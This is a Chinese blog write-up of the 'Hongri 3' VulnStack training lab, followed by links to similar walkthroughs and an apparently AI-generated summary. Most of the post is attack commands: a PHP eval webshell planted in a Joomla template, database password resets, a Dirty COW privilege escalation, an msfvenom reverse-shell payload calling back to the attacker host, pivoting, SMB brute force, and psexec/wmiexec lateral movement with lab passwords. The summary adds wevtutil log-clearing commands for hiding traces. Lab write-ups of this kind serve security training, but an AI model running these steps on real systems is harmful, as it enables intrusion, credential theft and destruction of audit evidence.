红日三靶场

最新推荐文章于 2024-10-22 19:41:02 发布
最新推荐文章于 2024-10-22 19:41:02 发布
阅读量1.2k 收藏 20
点赞数 27
文章标签: 网络安全 网络 chrome
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_62915924/article/details/138440158
版权

红日三
黑盒测试都不知道密码
知道web-centos是192.168.0.105
kali跟web-cenos都是桥接物理网络

1.nmap -T4 -O 192.168.0.104 查看开放端口 因为不知到版本可以加上-sV 查看发现是Linux的看到开放 80,3306,22端口
2.dirsearch -u http://192.168.0.104/ --exclude-status 400,401,403,404,405,501,503
  dirsearch -u http://192.168.0.104/ -e* 都可以扫描网站发现了/administrator进去查看一下,发现了joomla-cms网站
这个网站有固定漏洞configuration.php里面会有那个MySQL的账号密码
3.mysql -h 192.168.0.104 -u 账号 -p           
  在输入密码就可以进去
 show databases;
use joomals;
show tables;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
把登录的 am2zu的password改成123456,在那个joomla-cms登入用那个找到的administrator 和123456登入
4.因为是joomla在template中可以写入木马注意格式<?php eval($_POST'a']);?>
Editing file "/error.php" in template "beez3".根据给的话去推测路径因为dirsearch 扫描/templates/ 有这个可以推测
路径http://192.168.0.104/templates/beez3/error.php
5.用蚁剑连接一下发现了命令执行不了用插件绕过,发现插件绕过只能Linux用,把蚁剑装到kali里面去,在连接一下发现可以用,点一下php7_GC_uaf   php7_backtrace_uaf 发现得点两个才可以用可以成功命令执行但是是在192.168.93.120中
6.发现joomla可以ssh远程连接,刚好192.168.0.104有开放端口22ssh但是ssh需要那个账号密码,刚刚好去蚁剑找的c盘中的tmp有许多的账号密码而且是漏洞刚刚好找到账号密码
ssh wwwuser@192.168.0.104这个不行
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104    加上参数可以了
7.发现权限不够用脏牛漏洞提权(可以 firefart的管理员账号然后密码自定义)
先在本地下好脏牛的脚本    在kali中开 python3 -m http.server让192.168.0.104下载
wget http://192.168.0.105:8000/dirty.c(kali的地址)
 gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
8.做好了以后uname -a 看看Linux的位数发现是x64的
9.
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.105 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
造木马,在192.168.0.104下一下
wget http://192.168.0.105:8000/shell.elf(kali的地址)
chmod +x  shell.elf
./shell.elf
执行
10. kali开启监听
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 7777
run
11.  成功执行
run post/multi/manage/autoroute(添加全部记录)
run autoroute -p 
run post/multi/gather/ping_sweep rhosts=192.168.93.0/24
添加记录
12.内网信息探测 
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
 set threads 10
run
可以用那个proxychains开代理 proxychains nmap -Pn -sT -sV 192.168.93.10 -F
还有端口扫描
发现了其他的主机端口开放跟端口
     10.20.30 都是windows    100.120是Linux跟ubuntu
13   


192.168.93.10   20    30  都开放了445端口


看看永恒之蓝可以不发现不行,看看能不能用smb爆破出来密码,
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run可以
20  密码   123qwe!ASD
30      123qwe!ASD
10     zxcASDqw123!!

14.  用smb凭证攻击试试
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
 set rhosts 192.168.93.30
run
发现都可以但是有一个10 不行
用那个impacket-master/examples中的wmiexec.py 可以攻击不
proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
可以
可以尝试扫描一下再那个windows上传fscan扫描一下内网

15 192.168.93.100 跟192.168.93.120都开放了3306MySQL(可能有弱口令漏洞)

show databases;
use joomals;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104
wwwuser_123Aqx
ssh wwwuser@192.168.0.104
python3 -m http.server
wget http://192.168.0.104:8000/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
wget  http://192.168.0.107:8000/shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
 set threads 10
run

proxychains nmap -Pn -sT -sV 192.168.93.10 -F

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
 set rhosts 192.168.93.30
run

80 web端口
135 rpc漏洞
445,139永恒之蓝端口 主要是445
3306 MySQL端口
3389 远程控制 端口
7001 weblogic漏洞
22  ssh端口
23 telent端口

红日安全靶场3
weixin_48169878的博客
07-13 4442
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
渗透测试-红日靶场
konglong12311的博客
05-24 1229
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日ATT&CK VulnStack靶场
xhscxj的博客
08-14 536
1.扫描DMZ机器端口2.进行ssh和3306爆破无果后访问web服务3.已知目标是Joomla,扫描目录4.有用的目录分别为1.php5.configuration.php~中泄露了数据库密码6.administrator为后台登录地址7.直接连接mysql8.找到管理员表,密码加密了9.百度joomla密码的加密方式以及重置方式,用下面的方式添加新的管理员用户10.重置密码后登录后台11.搜索相关漏洞,用这个后台RCE12.访问后并没有回显。
VulnStack-ATT&CK-3(红日靶场
buffedon的博客
07-12 1万+
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内网渗透内网信息收集脏牛漏洞提权内网渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位域管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻域控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张网卡(仅主
红日安全 ATT&CK VulnStack靶场
baynk的博客
07-12 3195
0x00 前言 内网真的有点难搞,总是会碰到一些奇怪的问题。。。基础不难,地动山摇。 不知道原版哪下的,就放个自己云盘的,这玩意压缩后只有20G,解压后有100G… 放个下载地址:提取码: uecu 拓扑图如下 除了centos的出口网卡的IP是需要调整外,其余网卡都不需要调整。 0x01 Web打点 直接访问网站 发现很熟悉,joomla cms,国外比较有名的cms,直接上工具,kali里面带的joomscan [+] FireWall Detector [++] Firewall not det
红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-25 3696
ATT&CK红队评估(红日靶场)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
2021-7-7红日团队靶场
热门推荐
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
ATT&CK 红日靶场()-简记
zhoufy的博客
06-21 1109
端口目录访问 ip/1.php -->根目录、禁用函数!!!-------IP/configuration.php~-->>发现 testuser / cvcvgjASD!更改密码->>123456Step 》写马->>eval($_POST['123']);-》访问error.php--antsward 连接后无法执行命令:antsward-》加载插件-》辅助工具-》绕过disable_fuctions-》PHP7_GC_UAF 、PHP7_Backtrace_UAF。
红日靶场
红队是青春
11-18 6089
红日靶场关 一、环境配置 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机网络配置,添加新的网络,该网络作为内部网络。 注:名称及网段必须符合上述图片,进行了固定ip配置。 本次环境为黑盒测试,不提供虚拟机账号密码。 win10/kali:VMnet11 攻击机 web-centos:VMnet10、VMnet11 外网 w
红日3靶场-wp
shajianlong666的博客
06-04 565
内网渗透之-红日靶场3(传说可让你对内网渗透大彻大悟)
[红日靶机渗透] ATK&CK红队评估实战靶场
人若无名,便可专心练剑
02-08 1660
ATK&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一个用于描述和分类针对计算机系统的攻击行为的知识库。红队评估是指模拟真实攻击者行为的一种安全评估方法,通过模拟攻击思路、技术和方法来评估目标系统的安全性。
红日打靶!!!
woshicainiao666的博客
02-02 1235
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
内网渗透—红日靶场
一个普普通通的博客
04-23 5513
红日靶场—红队实战,内网渗透
红日靶场)1、环境介绍及环境搭建
zhouA0221的博客
10-22 1183
红日靶场03是一个用于安全测试和渗透测试的虚拟化环境,可以帮助用户通过模拟攻击和防御场景来提升网络安全技能。该靶场包含了多个虚拟机和网络配置,用户可以在其中进行各种安全测试活动,如信息收集、漏洞利用、权限提升等。
红日靶场vulnstack (
2301_76227305的博客
09-03 1362
这个靶场比前面两个要难一点点,主要是思路问题,比如前面的蚁剑发现的mysql文件,你要想得去尝试ssh连接,还有smb爆破取决于你的字典大小。其实在渗透过程中,我有尝试让主机上线CS方便横移,但是均失败了,可能是因为跳板机是Linux,上线的Windows主机都是个黑框。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
红日靶机()笔记
LINGX5的博客
10-04 2297
相较于前边两个靶场环境,靶场的难度还是稍难一点,有很多兔子洞,这就考验我们对已有信息的取舍和试错,以及对渗透测试优先级的判断。涉及到对数据库操作的试错,对 joomla 框架 cve 的快速学习,php 中 用到disabled_function 的 bypass ,对linux内核提权的取舍,对msf框架模块的熟悉与学习。包括了路由搭建、socks代理使用、smb服务爆破、psexec横向、kiwi(mimikatz)使用等。还使用的crackmapexec这款强大的工具。
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
m0_62783065的博客
03-16 1935
红日靶场】3——从靶场配置到漏洞发现、脏牛提权、反弹shell详细解出
红日安全红队靶场)一次简单的内网渗透
白帽技术与网络安全
07-24 6833
1、靶场介绍及设置这是红日团队的第靶场靶场下载地址见文末),本次靶场渗透涉及敏感信息泄露、暴力破解、脏牛提权、内网穿透、端口转发、以及域渗透等多种知识点。该靶场环境由5台机器组成,其...
红日靶场2
最新发布
04-02
<think>嗯,用户想找关于红日靶场的IT内容或技术资料,特别是涉及IT安全、靶场平台、漏洞测试和网络安全的信息。首先,我需要回顾一下用户提供的引用内容,看看哪些部分可以应用到这里。引用[1]提到红日靶场模拟了国内企业的实际业务场景,包括CMS、漏洞管理、域管理等,这应该和用户的需求相关。引用[2]和[3]分别涉及Weblogic漏洞利用和具体的工具使用,比如Redis、MDUT等,还有CVE漏洞的利用。引用[4]是关于日志清理的命令,可能和渗透后的痕迹清理有关。 用户的问题是要寻找相关的技术资料,可能需要包括靶场的设计理念、具体漏洞的利用方法、使用的工具以及渗透测试的步骤。我需要把这些信息整合起来,按照用户要求的格式,分点回答,结构清晰,同时生成相关问题。 接下来要确保回答中提到的技术点都有对应的引用来源,比如红日靶场的环境设计引用[1],Weblogic漏洞引用[2],工具使用引用[3],日志清理引用[4]。同时,需要检查用户提供的系统级指令,比如数学表达式使用$...$,但在这个问题中可能用不上,不过要留意是否有数学相关的内容。用户还要求生成相关问题,这部分需要围绕红日靶场的技术点来提问,比如渗透测试流程、漏洞利用方法、工具使用等。 另外,要确保回答用中文,并且引用标识自然添加在段落末尾。例如,在提到靶场设计时引用[^1],提到Weblogic漏洞时引用[^2],工具使用引用[^3],日志清理引用[^4]。需要避免使用Markdown格式,但用户给的示例中使用了代码块,可能需要在回答中包含代码示例,比如日志清理的命令,这时候用反引号包裹。 最后,生成的相关问题要围绕红日靶场的不同方面,比如环境搭建、漏洞分析、工具使用、渗透技巧等,确保问题具有针对性和实用性,帮助用户进一步探索相关内容。</think>### 红日靶场 IT安全技术解析 红日靶场作为国内领先的渗透测试训练平台,其核心价值在于**真实企业场景模拟**和**ATT&CK攻防框架实践**。以下是关键技术要点: #### 1. 靶场环境架构设计 - **多维度渗透路径**:覆盖Web应用层(如CMS漏洞)、中间件层(WebLogic漏洞)、内网域控等层级 - **典型漏洞集成**- **典型漏洞集成**: - **WebLogic反序列化漏洞**(CVE-2016-0638):通过`WebLogicTool`扫描验证,利用工具直接执行系统命令 ```bash java -jar WebLogicTool.jar -t CVE-2016-0638 -u http://target:7001 ``` - **Laravel远程代码执行**(CVE-2021-3129):使用专用EXP工具实现RCE #### 2. 渗透测试技术栈 - **工具链配置**: - 数据库利用:`Redis Insight`管理Redis数据库,`MDUT`进行多数据库联合攻击 - 后门维持:`Godzilla v2.96`和`中国蚁剑`双通道Webshell管理 - 横向移动:`cdk`检测容器环境漏洞,`mimikatz`抓取域凭据 - **痕迹清理技术**: ```powershell wevtutil cl security # 清除安全日志 wevtutil cl system # 清除系统日志 ``` 需配合`meterpreter`的`clearev`模块实现自动化清理 #### 3. 域渗透专项训练 - **黄金票据伪造**:通过域控服务器获取KRBTGT账户的NTLM哈希 - **SMB中继攻击**:利用Responder工具捕获Net-NTLMv2哈希 - **GPO策略利用**:通过组策略部署恶意计划任务
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值